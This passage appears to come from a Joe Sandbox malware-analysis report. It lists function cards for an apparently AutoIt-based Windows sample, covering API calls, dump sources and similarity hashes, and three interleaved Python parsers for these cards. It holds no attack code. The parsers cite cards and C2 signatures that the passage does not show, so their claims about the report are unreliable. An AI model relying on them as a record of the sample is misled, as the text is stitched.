• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
• Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
• Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
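The function cards above (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are what an analyst pivots on across reports: the API String ID, Opcode ID and Instruction Fuzzy Hash identify a function independently of the sample hash. The following parser is an added example, not Joe Sandbox's own code. It turns cards in this text layout into records, strips the "Download File" link text the HTML export glues onto dump names, and rebuilds each card's "API ID" from its API list. The API ID scheme it implements (split each API name on CamelCase, drop the W, A and Ex suffix words, sort, concatenate) is inferred from the cards on this page and is an assumption, not documented Joe Sandbox behaviour; the embedded sample input is copied from the GlobalMemorySleepStatus and MessageSend_wcslen cards above.

```python
"""Parse Joe Sandbox "Executed Functions" cards into pivotable records.
Added example; not Joe Sandbox code.  The API ID reconstruction is inferred
from the cards on this page (assumption)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SECTIONS = ("APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity")
DOWNLOAD_LINK = "Download File"   # link text glued onto dump names by the HTML export

# "Sleep.KERNEL32(00000000), ref: 00474833"
# "Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
FIELD_RE = re.compile(r"^(?P<key>[^:]+): (?P<value>.*)$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                      # address of the call instruction
    caller: Optional[int] = None  # set when the call lives in a subcall function


@dataclass
class FunctionCard:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    dump_sources: List[str] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # also holds "Snapshot File"


def parse_cards(text: str) -> List[FunctionCard]:
    cards: List[FunctionCard] = []
    card: Optional[FunctionCard] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            # "APIs" opens a card; another header with no open card means the
            # text starts mid-card, as the report section above does.
            if line == "APIs" or card is None:
                card = FunctionCard()
                cards.append(card)
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m is None:
                raise ValueError("unrecognised API line: " + line)
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            caller = int(m["caller"], 16) if m["caller"] else None
            card.apis.append(ApiCall(m["name"], m["module"], args,
                                     int(m["ref"], 16), caller))
        elif section == "Strings":
            card.strings.append(line)
        elif section == "Memory Dump Source":
            if line.endswith(DOWNLOAD_LINK):
                line = line[:-len(DOWNLOAD_LINK)]
            card.dump_sources.append(line)
        else:  # IDA Plugin / Similarity sections are "key: value" bullets
            m = FIELD_RE.match(line)
            if m:
                card.similarity[m["key"]] = m["value"]
    return cards


def api_id(card: FunctionCard) -> str:
    """Rebuild the card's "API ID" from its API list (inferred scheme, see above)."""
    words = []
    for call in card.apis:
        if re.search(r"[A-Z]", call.name):
            parts = re.findall(r"[A-Z][a-z0-9]*", call.name)   # CamelCase words
        else:
            parts = [call.name]                                 # htons, _wcslen, ...
        words.extend(p for p in parts if p not in ("W", "A", "Ex"))
    return "".join(sorted(words))


def cards_calling(cards: List[FunctionCard], api_name: str) -> List[FunctionCard]:
    """Cards whose own body (not a subcall) calls api_name."""
    return [c for c in cards
            if any(a.name == api_name and a.caller is None for a in c.apis)]


# Constructed sample: two cards copied from this report section.
SAMPLE_REPORT = """
APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
"""

CARDS = parse_cards(SAMPLE_REPORT)

if __name__ == "__main__":
    for c in CARDS:
        print(api_id(c), c.similarity.get("API String ID"), [a.name for a in c.apis])
```

Run against a whole exported report, the `similarity` dicts give you the Opcode ID and Instruction Fuzzy Hash values to search other reports for the same function, and `cards_calling` isolates the functions that directly invoke an API of interest (Sleep and GlobalMemoryStatusEx in the first card, SendMessageW in the second) without being misled by subcall entries.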
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
• Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
• Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
• Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
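The per-function records above follow one fixed layout (an APIs block with direct calls and "Part of subcall" lines, an empty or filled Strings block, the memory-dump provenance, and the Similarity fields). When a report carries thousands of such records, the practical first step is to parse them and pull out the calls that matter for triage: here the WININET entry point and the USER32 SendMessageW calls whose second argument is a list-box message. The following parser is an added example written for this page; it is not Joe Sandbox's own tooling, the sample text is a constructed, abbreviated copy of the records above, and the only external facts it relies on are the documented Win32 constants LB_ADDSTRING (0x180) and LB_DELETESTRING (0x182), which match the Msg arguments in the two SendMessageW records.

```python
import re

# Constructed sample in the same layout as the report's per-function records
# (only the fields the parser uses; the "Associated:" dump lines are omitted).
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Strings
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Direct call line:  InternetOpenW.WININET(arg,arg,...), ref: 00442B8C
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Subcall line:      Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
SUBCALL_RE = re.compile(
    r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")

# USER32 list-box messages seen in the report (documented Win32 constants).
LB_MESSAGES = {0x180: "LB_ADDSTRING", 0x182: "LB_DELETESTRING"}


def parse_records(text):
    """Split the listing into one dict per function record; a record starts at 'APIs'."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"calls": [], "subcalls": [], "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = SUBCALL_RE.match(body)
            if m:
                rec["subcalls"].append(m.groupdict())
                continue
            m = CALL_RE.match(body)
            if m:
                d = m.groupdict()
                d["args"] = [a.strip() for a in d["args"].split(",")] if d["args"] else []
                rec["calls"].append(d)
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            rec["similarity"][key] = value
    return records


def decode_sendmessage(call):
    """Name the Msg parameter (2nd argument) of a SendMessageW call; None if not applicable."""
    if call["api"] != "SendMessageW" or len(call["args"]) < 2:
        return None
    try:
        msg = int(call["args"][1], 16)
    except ValueError:  # '?' marks an argument the analyzer could not resolve
        return None
    return LB_MESSAGES.get(msg, "0x%X" % msg)


def triage(records):
    """Return (API ID, [tags]) per record: which dumped functions touch the network or GUI lists."""
    out = []
    for rec in records:
        tags = []
        for c in rec["calls"]:
            if c["mod"] == "WININET":
                tags.append("network:%s@%s" % (c["api"], c["ref"]))
            name = decode_sendmessage(c)
            if name:
                tags.append("gui:%s@%s" % (name, c["ref"]))
        out.append((rec["similarity"].get("API ID", "?"), tags))
    return out


if __name__ == "__main__":
    for api_id, tags in triage(parse_records(SAMPLE)):
        print(api_id, tags)
```

Run against the real listing, the `ref:` addresses in the tags are the call sites to open in the dumped image (`hcaresult_0_2_400000_AENiBH7X1q.jbxd`, base 00400000); the WININET hit at 00442B8C is the one worth following first, since the report's signatures attribute C2 traffic to this sample.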
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-2632631837
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• wsprintfW.USER32 ref: 004560E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E
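The per-function blocks above (APIs with their call-site references, memory dump sources, IDA snapshot, and the Similarity IDs and fuzzy hashes) are what an analyst pivots on when comparing this sample against others. The following parser is an added example, not Joe Sandbox code: it turns these text blocks into records so the API set, the subcall chain and the opcode/instruction hashes can be queried programmatically. The block layout is inferred from the report text itself (section keywords followed by "• key: value" bullets); the sample input is copied from the two function entries above, with the source lists shortened.

```python
"""Parse Joe Sandbox per-function disassembly blocks into queryable records.

Added example (not Joe Sandbox code). Format inferred from the report text:
each function is described by an "APIs" list, a "Strings" list, a
"Memory Dump Source" list, a "Joe Sandbox IDA Plugin" snapshot line and a
"Similarity" list, each written as "• key: value" bullets.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# "Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker; the
# parenthesised argument list is absent for CRT helpers such as "_doexit.LIBCMT".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w@?$]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address inside the dumped image
    caller: Optional[str] = None  # parent function address when reached via a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    sources: List[str] = field(default_factory=list)
    snapshot: Optional[str] = None


def _bullet(line):
    """Strip the bullet and split 'key: value' at the first separator."""
    key, _, value = line.lstrip("• ").strip().partition(": ")
    return key, value


def parse_report(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":          # every function entry opens with its API list
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:                # tail of a function whose APIs lie above the text
            current = FunctionRecord()
            records.append(current)
        if section == "APIs":
            m = API_RE.match(line.lstrip("• ").strip())
            if m:
                args = m.group("args").split(",") if m.group("args") else []
                current.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                            m.group("ref"), m.group("caller")))
        elif section == "Memory Dump Source":
            # keep only the dump name; drop ", Offset: ..." and any "Download File" link residue
            current.sources.append(_bullet(line)[1].split(",")[0].replace("Download File", ""))
        elif section == "Joe Sandbox IDA Plugin":
            current.snapshot = _bullet(line)[1]
        elif section == "Similarity":
            key, value = _bullet(line)
            current.similarity[key] = value.split("$") if key == "String ID" else value
    return records


def calls_to(records, api_name):
    """Functions that call api_name directly (subcall-inherited calls excluded)."""
    return [r for r in records if any(a.name == api_name and a.caller is None for a in r.apis)]


# Constructed input: the two function entries from the report, source lists shortened.
SAMPLE = """APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
• PostMessageW.USER32(00000000), ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.similarity.get("API ID"), [a.name for a in rec.apis], rec.sources)
```

Feeding a whole report through `parse_report` and grouping the records by `Opcode ID` or `Instruction Fuzzy Hash` is the quickest way to find functions shared with other samples; `calls_to` separates a function's own imports from those it merely reaches through subcalls, which matters when the API ID string (for example FindMessagePostSleepWindow) folds both together.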